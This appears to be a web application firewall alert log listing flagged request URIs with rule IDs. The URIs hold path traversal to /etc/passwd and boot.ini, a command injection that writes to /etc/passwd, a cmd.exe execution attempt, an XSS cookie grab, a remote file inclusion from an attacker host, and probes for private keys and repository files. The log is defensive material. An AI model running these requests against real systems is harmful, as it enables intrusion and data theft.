Packet [1236]	Uri [/web/forum_arc.asp?n=/.../.../.../.../.../.../boot.ini|36|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_&#039;/&#039;.]	Nattacks [3 ]	Signatures	[930120]	[942431]	[942460]
Packet [1237]	Uri [/web/forum_arc.asp?n=/../../../../../../../../../../../../../../../../../../../../boot.ini|36|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_&#039;/&#039;.]	Nattacks [8 ]	Signatures	[930100]	[930110]	[930110]	[930110]	[930110]	[930120]	[942431]	[942460]
Packet [1238]	Uri [/web/forum_arc.asp?n=/../../../../../../../../etc/passwd|36|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_&#039;/&#039;.]	Nattacks [9 ]	Signatures	[930100]	[930110]	[930110]	[930110]	[930110]	[930120]	[932160]	[942431]	[942460]
Packet [1239]	Uri [/web/forum_arc.asp?n=/.\"./.\"./.\"./.\"./.\"./boot.ini|36|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_&#039;/&#039;.]	Nattacks [7 ]	Signatures	[930110]	[930110]	[930120]	[942370]	[942430]	[942431]	[942460]
Packet [1240]	Uri [/web/forum_arc.asp?n=/etc/passwd%00|36|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_&#039;/&#039;.]	Nattacks [6 ]	Signatures	[920270]	[920271]	[920272]	[930120]	[932160]	[942431]
Packet [1241]	Uri [/web/forum_arc.asp?n=/etc/passwd|36|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_&#039;/&#039;.]	Nattacks [3 ]	Signatures	[930120]	[932160]	[942431]
Packet [1243]	Uri [/web/forum_arc.asp?n=c:\boot.ini|36|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_&#039;c:&#039;.]	Nattacks [2 ]	Signatures	[930120]	[942431]
Packet [1244]	Uri [/web/forum_professionnel.asp?n=%60/etc/passwd%60|41|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_&#039;`&#039;.]	Nattacks [9 ]	Signatures	[930120]	[932105]	[932160]	[942110]	[942260]	[942310]	[942430]	[942490]	[942431]
Packet [1245]	Uri [/web/forum_professionnel.asp?n=....//....//....//....//....//....//....//etc.passwd|41|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_&#039;/&#039;.]	Nattacks [2 ]	Signatures	[942431]	[942460]
Packet [1246]	Uri [/web/forum_professionnel.asp?n=../../../../../../../../../etc/passwd%00|41|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_&#039;/&#039;.]	Nattacks [14 ]	Signatures	[920270]	[920271]	[920272]	[930100]	[930110]	[930110]	[930110]	[930110]	[930110]	[930110]	[930120]	[932160]	[942431]	[942460]
Packet [1247]	Uri [/web/forum_professionnel.asp?n=/....../boot.ini|41|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_&#039;/&#039;.]	Nattacks [3 ]	Signatures	[930120]	[942431]	[942460]
Packet [1248]	Uri [/web/forum_professionnel.asp?n=/.../.../.../.../.../.../boot.ini|41|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_&#039;/&#039;.]	Nattacks [3 ]	Signatures	[930120]	[942431]	[942460]
Packet [1249]	Uri [/web/forum_professionnel.asp?n=/../../../../../../../../../../../../../../../../../../../../boot.ini|41|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_&#039;/&#039;.]	Nattacks [8 ]	Signatures	[930100]	[930110]	[930110]	[930110]	[930110]	[930120]	[942431]	[942460]
Packet [1250]	Uri [/web/forum_professionnel.asp?n=/../../../../../../../../etc/passwd|41|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_&#039;/&#039;.]	Nattacks [9 ]	Signatures	[930100]	[930110]	[930110]	[930110]	[930110]	[930120]	[932160]	[942431]	[942460]
Packet [1251]	Uri [/web/forum_professionnel.asp?n=/.\"./.\"./.\"./.\"./.\"./boot.ini|41|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_&#039;/&#039;.]	Nattacks [7 ]	Signatures	[930110]	[930110]	[930120]	[942370]	[942430]	[942431]	[942460]
Packet [1252]	Uri [/web/forum_professionnel.asp?n=/etc/passwd%00|41|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_&#039;/&#039;.]	Nattacks [6 ]	Signatures	[920270]	[920271]	[920272]	[930120]	[932160]	[942431]
Packet [1253]	Uri [/web/forum_professionnel.asp?n=/etc/passwd|41|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_&#039;/&#039;.]	Nattacks [3 ]	Signatures	[930120]	[932160]	[942431]
Packet [1255]	Uri [/web/forum_professionnel.asp?n=c:\boot.ini|41|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_&#039;c:&#039;.]	Nattacks [2 ]	Signatures	[930120]	[942431]
Packet [1259]	Uri [/web/homebet/homebet.dll?form=menu&amp;option=menu-signin]	Nattacks [1 ]	Signatures	[920440]
Packet [1262]	Uri [/web/imprimer.asp?no=%60/etc/passwd%60|44|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_&#039;`&#039;.]	Nattacks [9 ]	Signatures	[930120]	[932105]	[932160]	[942110]	[942260]	[942310]	[942430]	[942490]	[942431]
Packet [1263]	Uri [/web/imprimer.asp?no=....//....//....//....//....//....//....//etc.passwd|44|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_&#039;/&#039;.]	Nattacks [2 ]	Signatures	[942431]	[942460]
Packet [1264]	Uri [/web/imprimer.asp?no=../../../../../../../../../etc/passwd%00|44|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_&#039;/&#039;.]	Nattacks [14 ]	Signatures	[920270]	[920271]	[920272]	[930100]	[930110]	[930110]	[930110]	[930110]	[930110]	[930110]	[930120]	[932160]	[942431]	[942460]
Packet [1265]	Uri [/web/imprimer.asp?no=/....../boot.ini|44|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_&#039;/&#039;.]	Nattacks [3 ]	Signatures	[930120]	[942431]	[942460]
Packet [1266]	Uri [/web/imprimer.asp?no=/.../.../.../.../.../.../boot.ini|44|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_&#039;/&#039;.]	Nattacks [3 ]	Signatures	[930120]	[942431]	[942460]
Packet [1267]	Uri [/web/imprimer.asp?no=/../../../../../../../../../../../../../../../../../../../../boot.ini|44|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_&#039;/&#039;.]	Nattacks [8 ]	Signatures	[930100]	[930110]	[930110]	[930110]	[930110]	[930120]	[942431]	[942460]
Packet [1268]	Uri [/web/imprimer.asp?no=/../../../../../../../../etc/passwd|44|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_&#039;/&#039;.]	Nattacks [9 ]	Signatures	[930100]	[930110]	[930110]	[930110]	[930110]	[930120]	[932160]	[942431]	[942460]
Packet [1269]	Uri [/web/imprimer.asp?no=/.\"./.\"./.\"./.\"./.\"./boot.ini|44|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_&#039;/&#039;.]	Nattacks [7 ]	Signatures	[930110]	[930110]	[930120]	[942370]	[942430]	[942431]	[942460]
Packet [1270]	Uri [/web/imprimer.asp?no=/etc/passwd%00|44|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_&#039;/&#039;.]	Nattacks [6 ]	Signatures	[920270]	[920271]	[920272]	[930120]	[932160]	[942431]
Packet [1271]	Uri [/web/imprimer.asp?no=/etc/passwd|44|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_&#039;/&#039;.]	Nattacks [3 ]	Signatures	[930120]	[932160]	[942431]
Packet [1272]	Uri [/web/imprimer.asp?no=c:\boot.ini|44|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_&#039;c:&#039;.]	Nattacks [2 ]	Signatures	[930120]	[942431]
Packet [1277]	Uri [/web/index.php?topic=&amp;lt;script&amp;gt;alert(document.cookie)&amp;lt;/script&amp;gt;%20]	Nattacks [1 ]	Signatures	[941180]
Packet [1296]	Uri [/web/mailview.cgi?cmd=view&amp;fldrname=inbox&amp;select=1&amp;html=../../../../../../etc/passwd]	Nattacks [8 ]	Signatures	[930100]	[930110]	[930110]	[930110]	[930120]	[932115]	[932160]	[942460]
Packet [1299]	Uri [/web/mantis/summary_graph_functions.php?g_jpgraph_path=http%3A%2F%2Fattackershost%2Flistings.txt%3F]	Nattacks [2 ]	Signatures	[931120]	[931130]
Packet [1305]	Uri [/web/modif_infos.asp?n=%60/etc/passwd%60]	Nattacks [5 ]	Signatures	[930120]	[932105]	[932160]	[942110]	[942260]
Packet [1307]	Uri [/web/modif_infos.asp?n=../../../../../../../../../etc/passwd%00]	Nattacks [11 ]	Signatures	[920270]	[920271]	[920272]	[930100]	[930110]	[930110]	[930110]	[930110]	[930120]	[932160]	[942460]
Packet [1308]	Uri [/web/modif_infos.asp?n=/....../boot.ini]	Nattacks [2 ]	Signatures	[930120]	[942460]
Packet [1309]	Uri [/web/modif_infos.asp?n=/.../.../.../.../.../.../boot.ini]	Nattacks [2 ]	Signatures	[930120]	[942460]
Packet [1310]	Uri [/web/modif_infos.asp?n=/../../../../../../../../../../../../../../../../../../../../boot.ini]	Nattacks [5 ]	Signatures	[930100]	[930110]	[930110]	[930120]	[942460]
Packet [1311]	Uri [/web/modif_infos.asp?n=/../../../../../../../../../etc/passwd]	Nattacks [6 ]	Signatures	[930100]	[930110]	[930110]	[930120]	[932160]	[942460]
Packet [1312]	Uri [/web/modif_infos.asp?n=/.\"./.\"./.\"./.\"./.\"./boot.ini]	Nattacks [5 ]	Signatures	[930110]	[930110]	[930120]	[942370]	[942460]
Packet [1313]	Uri [/web/modif_infos.asp?n=/etc/passwd]	Nattacks [2 ]	Signatures	[930120]	[932160]
Packet [1314]	Uri [/web/modif_infos.asp?n=/etc/passwd%00]	Nattacks [5 ]	Signatures	[920270]	[920271]	[920272]	[930120]	[932160]
Packet [1315]	Uri [/web/modif_infos.asp?n=c:\boot.ini]	Nattacks [1 ]	Signatures	[930120]
Packet [1337]	Uri [/web/php/php4ts.dll]	Nattacks [1 ]	Signatures	[920440]
Packet [1342]	Uri [/web/productcart/database/EIPC.mdb]	Nattacks [1 ]	Signatures	[920440]
Packet [1351]	Uri [/web/pt_config.inc]	Nattacks [1 ]	Signatures	[920440]
Packet [1354]	Uri [/web/quikmail/nph-emumail.cgi?type=../%00]	Nattacks [6 ]	Signatures	[920270]	[920271]	[920272]	[930110]	[930110]	[942460]
Packet [1356]	Uri [/web/rubrique.asp?no=%60/etc/passwd%60|55|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_&#039;`&#039;.]	Nattacks [9 ]	Signatures	[930120]	[932105]	[932160]	[942110]	[942260]	[942310]	[942430]	[942490]	[942431]
Packet [1357]	Uri [/web/rubrique.asp?no=....//....//....//....//....//....//....//etc.passwd|55|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_&#039;/&#039;.]	Nattacks [2 ]	Signatures	[942431]	[942460]
Packet [1358]	Uri [/web/rubrique.asp?no=../../../../../../../../../etc/passwd%00|55|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_&#039;/&#039;.]	Nattacks [14 ]	Signatures	[920270]	[920271]	[920272]	[930100]	[930110]	[930110]	[930110]	[930110]	[930110]	[930110]	[930120]	[932160]	[942431]	[942460]
Packet [1359]	Uri [/web/rubrique.asp?no=/....../boot.ini|55|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_&#039;/&#039;.]	Nattacks [3 ]	Signatures	[930120]	[942431]	[942460]
Packet [1360]	Uri [/web/rubrique.asp?no=/.../.../.../.../.../.../boot.ini|55|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_&#039;/&#039;.]	Nattacks [3 ]	Signatures	[930120]	[942431]	[942460]
Packet [1361]	Uri [/web/rubrique.asp?no=/../../../../../../../../../../../../../../../../../../../../boot.ini|55|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_&#039;/&#039;.]	Nattacks [8 ]	Signatures	[930100]	[930110]	[930110]	[930110]	[930110]	[930120]	[942431]	[942460]
Packet [1362]	Uri [/web/rubrique.asp?no=/../../../../../../etc/passwd|55|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_&#039;/&#039;.]	Nattacks [9 ]	Signatures	[930100]	[930110]	[930110]	[930110]	[930110]	[930120]	[932160]	[942431]	[942460]
Packet [1363]	Uri [/web/rubrique.asp?no=/../../../etc/passwd|55|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_&#039;/&#039;.]	Nattacks [9 ]	Signatures	[930100]	[930110]	[930110]	[930110]	[930110]	[930120]	[932160]	[942431]	[942460]
Packet [1364]	Uri [/web/rubrique.asp?no=/.\"./.\"./.\"./.\"./.\"./boot.ini|55|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_&#039;/&#039;.]	Nattacks [7 ]	Signatures	[930110]	[930110]	[930120]	[942370]	[942430]	[942431]	[942460]
Packet [1365]	Uri [/web/rubrique.asp?no=/etc/passwd%00|55|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_&#039;/&#039;.]	Nattacks [6 ]	Signatures	[920270]	[920271]	[920272]	[930120]	[932160]	[942431]
Packet [1366]	Uri [/web/rubrique.asp?no=/etc/passwd|55|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_&#039;/&#039;.]	Nattacks [3 ]	Signatures	[930120]	[932160]	[942431]
Packet [1367]	Uri [/web/rubrique.asp?no=c:\boot.ini|55|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_&#039;c:&#039;.]	Nattacks [2 ]	Signatures	[930120]	[942431]
Packet [1369]	Uri [/web/scripts/tradecli.dll]	Nattacks [1 ]	Signatures	[920440]
Packet [1370]	Uri [/web/scripts/tradecli.dll?template=nonexistfile?template=..\..\..\..\..\winnt\system32\cmd.exe?/c+dir]	Nattacks [6 ]	Signatures	[920440]	[930100]	[930110]	[930110]	[930110]	[942460]
Packet [1378]	Uri [/web/shoutbox/expanded.php?conf=../../../../../../../etc/passwd%20]	Nattacks [6 ]	Signatures	[930100]	[930110]	[930110]	[930120]	[932160]	[942460]
Packet [1379]	Uri [/web/Site/biztalkhttpreceive.dll]	Nattacks [1 ]	Signatures	[920440]
Packet [1392]	Uri [/web/tmp_view.php?file=/etc/passwd]	Nattacks [2 ]	Signatures	[930120]	[932160]
Packet [1406]	Uri [/web/userreg.cgi?cmd=insert&amp;lang=eng&amp;tnum=3&amp;fld1=test999%0acat&lt;/var/spool/mail/login&gt;&gt;/etc/passwd]	Nattacks [5 ]	Signatures	[920272]	[921151]	[930120]	[932105]	[932160]
Packet [1442]	Uri [/web/includes/adovbs.inc]	Nattacks [1 ]	Signatures	[920440]
Packet [1443]	Uri [/web/adovbs.inc]	Nattacks [1 ]	Signatures	[920440]
Packet [1464]	Uri [/web/ptg_upgrade_pkg.log]	Nattacks [1 ]	Signatures	[920440]
Packet [1465]	Uri [/web/OA_HTML/oam/weboam.log]	Nattacks [1 ]	Signatures	[920440]
Packet [1490]	Uri [/web/pls/portal/owa_util.show_query_columns?ctable=sys.dba_users]	Nattacks [1 ]	Signatures	[942470]
Packet [1492]	Uri [/web/pls/portal/owa_util.cellsprint?p_theQuery=select+*+from+sys.dba_users]	Nattacks [1 ]	Signatures	[942470]
Packet [1513]	Uri [/web/OA_JAVA/oracle/forms/registry/Registry.dat]	Nattacks [1 ]	Signatures	[920440]
Packet [1782]	Uri [/web/includes/sendmail.inc]	Nattacks [1 ]	Signatures	[920440]
Packet [1828]	Uri [/web/administraçao.php]	Nattacks [1 ]	Signatures	[920272]
Packet [1830]	Uri [/web/administraçao/]	Nattacks [1 ]	Signatures	[920272]
Packet [1854]	Uri [/web/adminisztrátora.php]	Nattacks [1 ]	Signatures	[920272]
Packet [1855]	Uri [/web/adminisztrátora/]	Nattacks [1 ]	Signatures	[920272]
Packet [2044]	Uri [/web/includes/conexion.inc]	Nattacks [1 ]	Signatures	[920440]
Packet [2045]	Uri [/web/.svn/entries]	Nattacks [1 ]	Signatures	[930130]
Packet [2046]	Uri [/web/.svn/wc.db]	Nattacks [2 ]	Signatures	[920440]	[930130]
Packet [2047]	Uri [/web/.git/index]	Nattacks [1 ]	Signatures	[930130]
Packet [2048]	Uri [/web/.hg/dirstate]	Nattacks [1 ]	Signatures	[930130]
Packet [2057]	Uri [/web/httpd.conf]	Nattacks [1 ]	Signatures	[920440]
Packet [2058]	Uri [/web/httpd.conf.bak]	Nattacks [1 ]	Signatures	[920440]
Packet [2068]	Uri [/web/data/owncloud.log]	Nattacks [1 ]	Signatures	[920440]
Packet [2070]	Uri [/web/data/owncloud.db]	Nattacks [1 ]	Signatures	[920440]
Packet [2071]	Uri [/web/cloud/data/owncloud.log]	Nattacks [1 ]	Signatures	[920440]
Packet [2073]	Uri [/web/cloud/data/owncloud.db]	Nattacks [1 ]	Signatures	[920440]
Packet [2074]	Uri [/web/owncloud/data/owncloud.log]	Nattacks [1 ]	Signatures	[920440]
Packet [2076]	Uri [/web/owncloud/data/owncloud.db]	Nattacks [1 ]	Signatures	[920440]
Packet [2077]	Uri [/web/ownCloud/data/owncloud.log]	Nattacks [1 ]	Signatures	[920440]
Packet [2079]	Uri [/web/ownCloud/data/owncloud.db]	Nattacks [1 ]	Signatures	[920440]
Packet [2080]	Uri [/web/OwnCloud/data/owncloud.log]	Nattacks [1 ]	Signatures	[920440]
Packet [2082]	Uri [/web/OwnCloud/data/owncloud.db]	Nattacks [1 ]	Signatures	[920440]
Packet [2083]	Uri [/web/data/owncloud.log]	Nattacks [1 ]	Signatures	[920440]
Packet [2084]	Uri [/web/cloud/data/owncloud.log]	Nattacks [1 ]	Signatures	[920440]
Packet [2085]	Uri [/web/owncloud/data/owncloud.log]	Nattacks [1 ]	Signatures	[920440]
Packet [2086]	Uri [/web/ownCloud/data/owncloud.log]	Nattacks [1 ]	Signatures	[920440]
Packet [2087]	Uri [/web/OwnCloud/data/owncloud.log]	Nattacks [1 ]	Signatures	[920440]
Packet [2093]	Uri [/web/data/owncloud.db]	Nattacks [1 ]	Signatures	[920440]
Packet [2094]	Uri [/web/cloud/data/owncloud.db]	Nattacks [1 ]	Signatures	[920440]
Packet [2095]	Uri [/web/owncloud/data/owncloud.db]	Nattacks [1 ]	Signatures	[920440]
Packet [2096]	Uri [/web/ownCloud/data/owncloud.db]	Nattacks [1 ]	Signatures	[920440]
Packet [2097]	Uri [/web/OwnCloud/data/owncloud.db]	Nattacks [1 ]	Signatures	[920440]
Packet [2099]	Uri [/web/rsa.old]	Nattacks [1 ]	Signatures	[920440]
Packet [2101]	Uri [/web/dsa.old]	Nattacks [1 ]	Signatures	[920440]
Packet [2103]	Uri [/web/id_rsa.old]	Nattacks [1 ]	Signatures	[920440]
Packet [2105]	Uri [/web/id_dsa.old]	Nattacks [1 ]	Signatures	[920440]
Packet [2119]	Uri [/web/.git/config]	Nattacks [1 ]	Signatures	[930130]
Packet [2120]	Uri [/web/includes/db.inc]	Nattacks [1 ]	Signatures	[920440]
Packet [2131]	Uri [/web/_vti_bin/owssvr.dll]	Nattacks [1 ]	Signatures	[920440]
Packet [2134]	Uri [/web/_vti_bin/_vti_aut/WS_FTP.log]	Nattacks [1 ]	Signatures	[920440]
Packet [2135]	Uri [/web/_vti_bin/_vti_aut/ws_ftp.log]	Nattacks [1 ]	Signatures	[920440]
Packet [2136]	Uri [/web/_vti_bin/_vti_aut/author.dll]	Nattacks [1 ]	Signatures	[920440]
Packet [2239]	Uri [/web/.sqlite_history]	Nattacks [1 ]	Signatures	[930130]
Packet [2240]	Uri [/web/.config.local.php.swp]	Nattacks [1 ]	Signatures	[920440]
# N. packets [2241], [292] with alerts, N. Alerts [983]
